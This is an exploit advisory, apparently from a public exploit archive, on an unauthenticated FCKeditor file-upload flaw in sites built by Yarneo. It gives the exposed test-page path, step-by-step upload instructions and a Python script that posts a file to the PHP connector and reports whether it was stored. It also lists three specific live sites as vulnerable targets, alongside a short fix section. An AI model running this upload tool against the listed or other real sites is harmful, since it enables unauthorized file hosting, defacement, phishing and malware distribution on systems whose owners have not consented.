KingSkrupellos

Yarneo WebDesign Unauthorized File Insertion

May 21st, 2019
####################################################################
 
# Exploit Title : Yarneo WebDesign Unauthorized File Insertion
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/05/2019
# Vendor Homepage : yarneo.ru
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
 
####################################################################
 
# Description About Software :
*****************************
Yarneo is a web design and development company in Russia.
 
####################################################################
 
# Impact :
***********
Sites built by Yarneo ship the FCKeditor file manager with its test page
/fckeditor/editor/filemanager/connectors/uploadtest.html reachable without
authentication, and the PHP connector behind it is enabled. Any visitor can
therefore upload files into the web root (/pic/userfile/) with no login and
no check on who submitted the file.

Unauthenticated upload of attacker-chosen content lets an attacker host
arbitrary files on the site (defacement, phishing pages, malware hosting).
Executing uploaded code in the context of the web server process would
additionally require the connector to accept a server-executable extension,
or the server to interpret one of the permitted types (.txt .jpg .gif .png)
as code; this advisory demonstrates the upload, not code execution. Other
attacks are also possible.
 
####################################################################
 
# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/fckeditor/editor/filemanager/connectors/uploadtest.html
 
Select the "File Uploader" to use : choose PHP, pick a file and upload it.
The test page posts the file to the PHP connector's upload.php with
Type=File (form field NewFile); no session or credentials are required.
 
Directory File Path :
**********************
/pic/userfile/[YOURFILENAME].txt .jpg .gif .png
 
Check : after the upload the connector answers with a page that calls
window.parent.OnUploadCompleted(errorNumber, fileUrl, fileName, customMsg).
errorNumber 0 means the file was stored, 201 means it was stored under the
renamed fileName, 202 means the extension was rejected. Request the returned
fileUrl to confirm the file is served from /pic/userfile/.
 
Fix : remove the file manager test pages (uploadtest.html, test.html) from
production, set $Config['Enabled'] = false in
fckeditor/editor/filemanager/connectors/php/config.php, and put any connector
the site really needs behind the application's own authentication.
 
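The upload path above, as an added example that is not part of the original advisory: a small Python checker that requests the test page, posts a harmless .txt canary to the PHP connector the way uploadtest.html does, and decodes the connector's OnUploadCompleted() reply. The connector path, the NewFile field name, the Type=File parameter and the error-code table are taken from FCKeditor 2.x's bundled files, not from this advisory; the target host, the canary file name and its content are assumptions. Run it only against hosts you are authorized to test.

```python
"""Check an FCKeditor deployment for the unauthenticated upload path.

Added example, not code from the advisory or from Yarneo. Assumptions (not
from the page): the PHP connector is at CONNECTOR + "/upload.php", accepts
the file in the form field "NewFile" with ?Type=File, and replies with the
OnUploadCompleted() script that FCKeditor 2.x's upload.php emits.
"""
import re
import sys
import urllib.error
import urllib.request
import uuid

CONNECTOR = "/fckeditor/editor/filemanager/connectors/php"
TEST_PAGE = "/fckeditor/editor/filemanager/connectors/uploadtest.html"

# Error numbers passed to OnUploadCompleted() by FCKeditor 2.x (from its
# bundled uploadtest.html; verify against the copy on the target).
UPLOAD_ERRORS = {
    0: "file uploaded",
    1: "custom error (connector disabled or rejected the request)",
    201: "file uploaded under a renamed file name",
    202: "invalid file (extension not permitted)",
    203: "security error (server-side permissions)",
}

_ONUPLOAD = re.compile(
    r'OnUploadCompleted\(\s*(\d+)\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)'
)


def build_upload_request(base_url, filename, content, boundary=None):
    """Return (url, headers, body) for the multipart POST uploadtest.html sends."""
    boundary = boundary or uuid.uuid4().hex
    body = b"".join([
        b"--" + boundary.encode() + b"\r\n",
        b'Content-Disposition: form-data; name="NewFile"; filename="'
        + filename.encode() + b'"\r\n',
        b"Content-Type: application/octet-stream\r\n\r\n",
        content, b"\r\n",
        b"--" + boundary.encode() + b"--\r\n",
    ])
    headers = {"Content-Type": "multipart/form-data; boundary=" + boundary}
    return base_url.rstrip("/") + CONNECTOR + "/upload.php?Type=File", headers, body


def parse_upload_response(html):
    """Decode the OnUploadCompleted(...) call the connector returns."""
    m = _ONUPLOAD.search(html)
    if not m:
        return {"error": None, "file_url": None, "file_name": None,
                "message": "no OnUploadCompleted() in response"}
    code = int(m.group(1))
    return {"error": code, "file_url": m.group(2), "file_name": m.group(3),
            "message": m.group(4) or UPLOAD_ERRORS.get(code, "unknown error code")}


def assess(test_page_status, upload):
    """Combine the test-page status and the decoded upload reply into a verdict."""
    if upload["error"] in (0, 201):
        return "VULNERABLE: unauthenticated upload stored at " + upload["file_url"]
    if test_page_status == 200:
        return "test page exposed but upload rejected: " + str(upload["message"])
    return "not exposed"


def probe(base_url, filename="canary.txt", content=b"fckeditor upload check\n"):
    """Live check: GET the test page, then attempt a harmless .txt upload."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + TEST_PAGE, timeout=10) as r:
            status = r.status
    except urllib.error.HTTPError as e:
        status = e.code
    url, headers, body = build_upload_request(base_url, filename, content)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            html = r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        html = e.read().decode("utf-8", "replace")
    return assess(status, parse_upload_response(html))


if __name__ == "__main__":
    # usage: python3 fck_upload_check.py https://target.example
    print(probe(sys.argv[1]))
```

A verdict of VULNERABLE with a fileUrl under /pic/userfile/ reproduces the finding; the stored canary is the only artefact and should be removed from the target after the test. A 202 reply on the .txt canary means the permitted-extension list is stricter than the advisory lists.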
####################################################################
 
# Example Vulnerable Sites :
************************
[+] xn--1-7sb3aeok0dwc.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html
 
[+] xn--l1adfni2d.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html
 
[+] xn--90auhhdlh4g.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html
 
####################################################################
 
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
 
####################################################################